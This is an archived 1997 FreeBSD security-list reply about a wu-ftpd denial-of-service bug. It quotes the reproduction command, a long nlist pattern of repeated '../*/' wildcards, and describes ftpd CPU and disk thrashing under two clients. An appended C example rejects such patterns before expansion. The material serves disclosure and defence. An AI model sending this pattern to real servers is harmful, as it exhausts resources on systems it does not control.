Date: Tue, 9 Sep 1997 19:41:21 +0200
From: Philippe Regnauld <regnauld@deepo.prosa.dk>
To: Josef Karthauser <joe@pavilion.net>
Cc: security@FreeBSD.ORG
Subject: Re: FTP compromise.
Message-ID: <19970909194121.10288@deepo.prosa.dk>
In-Reply-To: <19970909144346.54450@pavilion.net>; from Josef Karthauser on Tue, Sep 09, 1997 at 02:43:46PM +0100
References: <19970909144346.54450@pavilion.net>

Josef Karthauser writes:
> ll versions)
>
> TESTED: BSDI 3.0 (all patches), FreeBSD 2.2.1
>
> DATE: 15th Aug 1997
>
> REPEAT BY: Log into a wu_ftp server (either anonymously or as a user)
> and issue the command...
>
> nlist ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*../*../*
Behaves differently depending on client.
Stock ftp in -current (as of 28/07) makes ftpd eat 45% cpu, but
no noticeable memory footprint increase.
Killing ftp (the client) solves the problem.
With ncftp2, I get ftpd at 10-12% cpu, in a biowait loop, and
constant seeking on the disks. Killing ftpD is the only way out.
--
-- Phil
-[ Philippe Regnauld / Systems Administrator / regnauld@deepo.prosa.dk ]-
-[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]-
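
A pre-expansion check of the kind a server could apply to the argument in the quoted report, as an added example that is not part of the original message or of any ftpd source: it refuses LIST/NLST patterns with too many wildcard or ".." components before any wildcard expansion is attempted. The function names and the limits are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative limits (assumptions, not taken from any ftpd); tune per site. */
#define MAX_WILD_SEGMENTS 3    /* path components containing glob metacharacters */
#define MAX_PARENT_REFS   2    /* ".." path components */
#define MAX_ARG_LEN       512  /* bytes */

/* Return 1 if the path component s[0..len) contains a glob metacharacter. */
static int seg_has_wildcard(const char *s, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (s[i] == '*' || s[i] == '?' || s[i] == '[' || s[i] == '{')
            return 1;
    return 0;
}

/* Return 0 if arg is within the limits, -1 if it should be refused unexpanded. */
int check_list_pattern(const char *arg)
{
    size_t wild = 0, parents = 0;

    if (arg == NULL || strlen(arg) > MAX_ARG_LEN)
        return -1;
    for (const char *p = arg; *p != '\0'; ) {
        size_t len = strcspn(p, "/");           /* length of this component */
        if (len == 2 && p[0] == '.' && p[1] == '.')
            parents++;
        else if (seg_has_wildcard(p, len))
            wild++;
        if (wild > MAX_WILD_SEGMENTS || parents > MAX_PARENT_REFS)
            return -1;                          /* stop at the first excess */
        p += len;
        if (*p == '/')
            p++;                                /* skip the separator */
    }
    return 0;
}

int main(void)
{
    /* Constructed sample arguments; the last has the shape quoted above. */
    const char *samples[] = { "*.txt", "pub/*/README", "../*/../*/../*/../*/" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s %s\n", samples[i],
               check_list_pattern(samples[i]) == 0 ? "accept" : "refuse");
    return 0;
}
```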
